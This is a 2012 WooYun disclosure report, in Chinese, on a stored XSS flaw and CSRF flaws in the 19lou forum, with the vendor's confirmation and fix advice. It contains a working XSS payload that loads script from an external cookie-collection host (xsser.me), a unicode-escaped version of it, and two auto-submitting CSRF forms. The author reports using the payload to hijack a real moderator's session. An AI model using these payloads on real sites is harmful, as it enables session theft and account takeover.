当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010492

漏洞标题:十九楼存储型小松鼠(XSS),暗杀十九楼小帮办以及各位超级版主

相关厂商:十九楼

漏洞作者: imlonghao

提交时间:2012-08-02 14:00

修复时间:2012-09-16 14:01

公开时间:2012-09-16 14:01

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-02: 细节已通知厂商并且等待厂商处理中
2012-08-02: 厂商已经确认,细节仅向厂商公开
2012-08-12: 细节向核心白帽子及相关领域专家公开
2012-08-22: 细节向普通白帽子公开
2012-09-01: 细节向实习白帽子公开
2012-09-16: 细节向公众公开

简要描述:

19楼某处过滤不严格,导致一个敏感地方存储型XSS。
再加上COOKIES中木有HTTPONLY,成功暗杀一个十九楼小帮办
目测19楼当中各类接口木有REFERER检查,各种CSRF就顺便提一下呗~~~
看杀气哥他们题目那么霸气,自己题目也得跟上!~
目测19楼的礼物很容易拿,求礼品求礼品`~~~~

详细说明:

在论坛中随便找一个帖子回帖,先随便写一点内容发出去,然后高级编辑!
上传一张图片,然后点发布!
用FIDDLER2截包,先放过http://www.19lou.com/util/keyword这个接口的数据,这个不是重点。
http://www.19lou.com/post/edit 这个才是重点。


这个POST包中,attachments对传入数据的过滤不严格。
经过测试,直接在图片地址中加入">会系统错误,返回HTTP500错误。
目测,[{ }]这样子的几乎都能用JS的UNICODE转义插入在POST,转义后就是\u0022\u003e
我们把\u0022\u003e插在name中最后的.png后面。
看看效果


果断测漏了,我们再次编辑,在后面加上自己的JS代码即可~~

"><script src=http://xsser.me/UZH56T></script><img high=0 weight=0


我用这段代码进行测试,后面的<img high=0 weight=0 是为了屏蔽测漏的信息,达到更好的隐藏效果。
上面那段话经过js的unicode转义后就是这样,同样插入到.png的后面

\u0022\u003e\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0055\u005a\u0048\u0035\u0036\u0054\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u003c\u0069\u006d\u0067\u0020\u0068\u0069\u0067\u0068\u003d\u0030\u0020\u0077\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020


顺利插入~


漏洞证明:

http://support.19lou.com/forum-10-thread-229001343815994430-1-1.html
其中暗杀了一个小帮办~


各类权限


成果。


=========CSRF=========
改签名

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://www.19lou.com/user/sign/save_sign" method="post">
<input type="text" name="sign_text" value="XXX" />
</form>
<script>
	document.imlonghao.submit();
</script>
</body>
</html>


发博客

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://www.19lou.com/user/blog/publish" method="post">
<input type="text" name="subject" value="TITLE" />
<input type="text" name="content" value="BODYBODYBODYBODYBODYBODYBODY" />
</form>
<script>
	document.imlonghao.submit();
</script>
</body>
</html>


目测CSRF还有很多,自己检查检查吧~~~~

修复方案:

XSS:
attachments中过滤js的unicode转义,过滤">等等。
同时,加上HTTPONLY,详见关于HTTPONLY的那点事( http://imlonghao.com/post/2012-08-02/关于HTTPONLY的那点事 )
CSRF:
关键接口验证信息来源(REFERER),加上随机的TOKEN信息在表单中。

版权声明:转载请注明来源 imlonghao@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-08-02 14:49

厂商回复:

谢谢洞主,情况已在掌握中。会尽快处理

最新状态:

暂无

漏洞评价:

评论

  1. 2012-08-02 14:47 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

  2. 2012-08-02 15:15 | YunDay ( 路人 | Rank:30 漏洞数:4 | http://www.yunday.org)

    。。各种帮办躺着中枪

  3. 2012-08-03 08:00 | Max ( 实习白帽子 | Rank:45 漏洞数:7 | When you see this sentence, I have been ...)

    标题越霸气越好

  4. 2012-09-02 01:32 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    躺枪。

  5. 2012-09-02 12:26 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    哇。神牛再现